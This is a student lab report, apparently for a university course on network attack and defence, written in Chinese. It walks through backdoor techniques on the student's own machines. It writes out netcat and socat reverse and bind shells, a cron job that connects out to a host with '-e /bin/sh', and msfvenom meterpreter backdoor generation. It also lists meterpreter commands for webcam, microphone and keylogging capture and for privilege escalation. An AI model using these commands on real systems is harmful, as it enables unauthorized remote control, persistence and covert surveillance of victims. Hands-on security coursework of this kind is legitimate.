20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践 2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

常用后门工具

一、Windows获得Linux的Shell

在本机cmd中使用ipconfig获得windows的IP地址

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

1.windows 打开监听

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

2.Linux反弹连接win
nc(主机ip) 5231(所设置的端口) -e /bin/sh

3.windows下获得一个linux shell,可运行任何指令,如ls

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

二、Linux获得Win Shell

ifconfig获得虚拟机IP
20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

1.Linux运行监听指令

使用指令,nc -l -p 5231,监听5231端口

2.Windows反弹连接Linux

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

3.Linux下看到Windows的命令提示

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

三、使用nc传输数据

1.Windows下监听5231端口:
20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

2.Kali下连接到Windows的5231端口:

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

3.建立连接之后,就可以传输数据了:

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

实验内容

一、使用netcat获取主机操作Shell,cron启动

先在Windows系统下,用ncat.exe -l -p 5231,监听端口

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

crontab -e指令编辑一条定时任务
20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

在最后一行加入53* * * * /bin/netcat 10.1.1.141 5236 -e /bin/sh,意思是在每个小时的第53分钟(为测试结果方便所选时间最好离现实时间较近)反向连接Windows主机的5231端口,就会启动cron

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

到时间后,便获得了Kali的shell,可以输入指令
20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

二、使用socat获取主机操作Shell, 任务计划启动

在Windows系统下,打开控制面板->管理工具->任务计划程序(可在控制面板直接搜索任务计划),创建任务,填写任务名称后,新建一个触发器

在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5231 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5231,同时把cmd.exe的stderr重定向到stdout上:

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

创建完成之后,选择运行
20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

然后在Kali环境下输入指令socat - tcp:IP(目标主机):5231,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5231端口,此时可以发现已经成功获得了一个cmd shell

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=虚拟机IP LPORT=5231 -f exe > 20155231_backdoor.exe生成后门程序

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

然后通过nc指令将生成的后门程序传送到Windows主机上
windows:ncat.exe -l 5231 > 20155231_backdoor.exe

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

kali:nc IP(win) 5231 < 20155231.exe

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

在Kali上使用msfconsole指令进入msf控制台,

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

设置完成后,利用exploit,执行监听

在windows中,运行20155231_backdoor.exe

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 使用record_mic指令可以截获一段音频

20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

  • 使用webcam_snap指令可以使用摄像头进行拍照

  • 使用webcam stream指令可以使用摄像头进行录像

  • 使用screenshot指令可以进行截屏
    20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

  • 先使用getuid指令查看当前用户,使用getsystem指令进行提权
    20155231 邵煜楠 《网络对抗技术》实验二:后门原理与实践
2017-2018-2 20155231《网络对抗技术》实验二:后门原理与实践

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 下载安装软件

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • 直接启动,定时启动。

(3)Meterpreter有哪些给你映像深刻的功能?

  • 更改获得权限,打开目标主机摄像头等控件

(4)如何发现自己有系统有没有被安装后门?

  • 杀毒软件,监控程序运行

实验总结与体会

本次实验,由于虚拟机网络连接经常出现问题,借用了同学的虚拟机做实验。学习使用了nc等后门工具。完成了使用MSF截屏、录音等操作,提权失败。